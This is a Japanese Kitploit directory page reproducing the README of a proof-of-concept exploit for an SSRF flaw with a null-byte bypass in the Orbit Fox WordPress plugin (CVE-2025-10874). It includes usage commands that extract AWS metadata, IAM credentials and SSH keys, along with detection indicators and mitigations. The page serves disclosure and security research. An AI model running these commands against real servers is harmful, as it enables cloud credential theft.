Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — CVE-2025-10874に対するヌルバイトインジェクション回避を用いたSSRFの実証 | Kitploit
ツール/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

CVE-2025-10874に対するヌルバイトインジェクション回避を用いたSSRFの実証

リポジトリを見る
10ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

alt text

CVE-2025-10874 - Orbit Fox SSRF 概念実証

Orbit Fox WordPress プラグインにおけるサーバーサイドリクエストフォージェリ(SSRF)の脆弱性を、ヌルバイトインジェクションのバイパスとともに実証する概念実証エクスプロイトです。

詳細なブログ記事: https://ryanmroth.com/articles/orbit-fox-ssrf

脆弱性の詳細

詳細メモ
CVE ID:CVE-2025-10874
影響を受けるプラグイン:ThemeIsle 製 Orbit Fox
脆弱性の種類:サーバーサイドリクエストフォージェリ(SSRF)(CWE-918)
CVSS スコア:5.5(中)
必要な権限:Author+(WordPress の Author ロール以上)
修正バージョン3.0.2+

説明

Orbit Fox プラグインの MyStock インポート機能には SSRF の脆弱性が存在し、Author+ 権限を持つ認証済みユーザーが WordPress サーバーから任意の HTTP リクエストを送信できるようになります。この脆弱性は handle-request-mystock-import AJAX アクションに存在し、URL パラメータの検証とサニタイズが適切に行われていません。

このエクスプロイトは ヌルバイトインジェクションのバイパス(%00.txt)を利用して URL 検証を回避し、内部メタデータサービス、クラウドプロバイダー API、およびサーバーからアクセス可能なその他のネットワークリソースへのアクセスを可能にします。

一般的な攻撃シナリオ

AWS EC2 メタデータの抽出

  • インスタンスのホスト名: http://169.254.169.254/latest/meta-data/hostname
  • IAM 認証情報: http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • SSH 公開鍵: http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

インストール

要件

  • Python 3.7+
  • requests ライブラリ
  • urllib3 ライブラリ

セットアップ

root@kitploit:~
# リポジトリをクローン
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# 依存関係をインストール(uv を使用)
uv sync

# または pip を使用
pip install requests urllib3

使用方法

基本的な使用方法

root@kitploit:~
# AWS インスタンスのホスト名を抽出(デフォルトのターゲット)
python orbit_fox_poc.py http://target.com -u author -p password123

# カスタム SSRF ターゲット URL を指定
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

高度な例

root@kitploit:~
# IAM ロールの認証情報を抽出
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# SSH 公開鍵を抽出
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# ヌルバイトバイパスなしでテスト(パッチ適用済みバージョンでは失敗します)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# トラブルシューティング用にデバッグ出力を有効化
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

コマンドラインオプション

root@kitploit:~
positional arguments:
  target                Target WordPress URL (e.g., http://example.com)

required arguments:
  -u, --username        WordPress username (Author+ role required)
  -p, --password        WordPress password

optional arguments:
  -h, --help            Show help message and exit
  -s, --ssrf-url        URL to request via SSRF
                        (default: http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         Disable null byte bypass (test basic SSRF only)
  --debug               Enable debug output for troubleshooting

動作の仕組み

  1. 認証: 提供された認証情報を使用して WordPress に認証します
  2. Nonce の取得: WordPress 管理パネルからセキュリティ nonce を抽出します
  3. ヌルバイトインジェクション: ターゲット URL に %00.txt を追加して検証をバイパスします
  4. SSRF の実行: handle-request-mystock-import AJAX エンドポイントに細工したリクエストを送信します
  5. コンテンツの取得: WordPress メディアライブラリから取得したコンテンツを取得して表示します

検出

ログの指標

  • メタデータサービス(169.254.169.254)への異常な送信 HTTP リクエスト
  • アクション handle-request-mystock-import を使用した admin-ajax.php へのリクエスト
  • 内部/メタデータ URL からの WordPress メディアライブラリへのアップロード

緩和策

  • Orbit Fox をバージョン 3.0.2 以降に更新する
  • WordPress サーバーに厳格な出力フィルタリングを実装する
  • クラウドメタデータエンドポイントへのアクセスを監視および制限する
  • ユーザーロールを確認し、Author+ 権限を制限する

責任ある開示

この脆弱性はベンダーに責任を持って開示され、Orbit Fox バージョン 3.0.2 でパッチが適用されています。この概念実証は以下の目的で提供されています:

  • セキュリティ研究およびテスト
  • 許可されたシステムの脆弱性評価
  • 教育目的

法的免責事項

許可されたセキュリティテストのみ

このツールは教育および許可されたセキュリティテストの目的のみで提供されています。コンピュータシステムへの不正アクセスは違法です。ユーザーは以下を行う必要があります:

  • テスト前に明示的な書面による許可を取得する
  • 所有している、またはテストする許可があるシステムでのみ使用する
  • 適用されるすべての法律および規制を遵守する

作者はこのツールの誤用について一切の責任を負いません。

参考情報

  • 元の脆弱性 Alex Sanford – CVE-2023-2287
  • CVE 詳細: CVE-2025-10874
  • プラグインリポジトリ: Orbit Fox by ThemeIsle
  • AWS メタデータサービス: Instance Metadata Service

最終更新日: 2025-10-06

ツールをダウンロード